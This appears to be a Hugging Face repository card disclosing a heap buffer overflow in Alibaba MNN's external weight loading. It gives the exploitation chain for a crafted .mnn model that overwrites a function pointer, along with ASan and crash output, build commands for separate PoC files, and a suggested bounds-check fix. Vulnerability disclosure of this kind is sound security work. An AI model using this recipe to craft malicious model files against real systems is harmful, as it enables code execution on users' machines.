YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
PoC: Alibaba MNN β External Weight Size Mismatch β Heap OOB WRITE β RIP Redirect
Vulnerability
In OpCommonUtils.cpp, when loading external weights for Scale/LayerNorm operators,
biasData is allocated based on externalInfo[1] (scaleSize) but read with
externalInfo[2] (biasSize). When biasSize > scaleSize β heap buffer overflow WRITE.
Exploitation Chain
- Crafted .mnn model:
externalInfo = [offset, scaleSize=16, biasSize=1000] biasData = vector<float>(4)β 16 bytes allocatedexternal->read(biasData.data(), 1000)β 1000 bytes written into 16-byte buffer- Overflow of 984 bytes with file-controlled content
- Adjacent victim object's function pointer overwritten
- Calling corrupted function pointer β SIGSEGV at attacker-controlled address
ASan Proof (WRITE)
ERROR: AddressSanitizer: heap-buffer-overflow
WRITE of size 1000 at 0x... thread T0
#0 in __asan_memcpy
0x... is located 0 bytes after 16-byte region
RIP Redirect Proof
callback = 0x335af030 β OVERFLOW-WRITTEN
Calling victim->callback() with OVERFLOW-WRITTEN pointer...
Signal: 11, Faulting address: 0x335af030
[ACE CONFIRMED] RIP redirected into attacker's data buffer!
Reproduction
# Step 1: ASan WRITE proof
clang++ -fsanitize=address -g -std=c++17 -o poc_mnn poc_mnn.cpp && ./poc_mnn
# Step 2: RIP redirect proof
clang++ -g -O0 -std=c++17 -o poc_mnn_ace poc_mnn_ace.cpp && ./poc_mnn_ace
Suggested Fix
// OpCommonUtils.cpp, before the read:
if (externalInfo[2] > externalInfo[1]) {
MNN_ERROR("biasSize exceeds scaleSize\n");
return false;
}
Related
CVE-2026-7482 "Bleeding Llama" (CVSS 9.1) β same class: unchecked file-supplied size
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support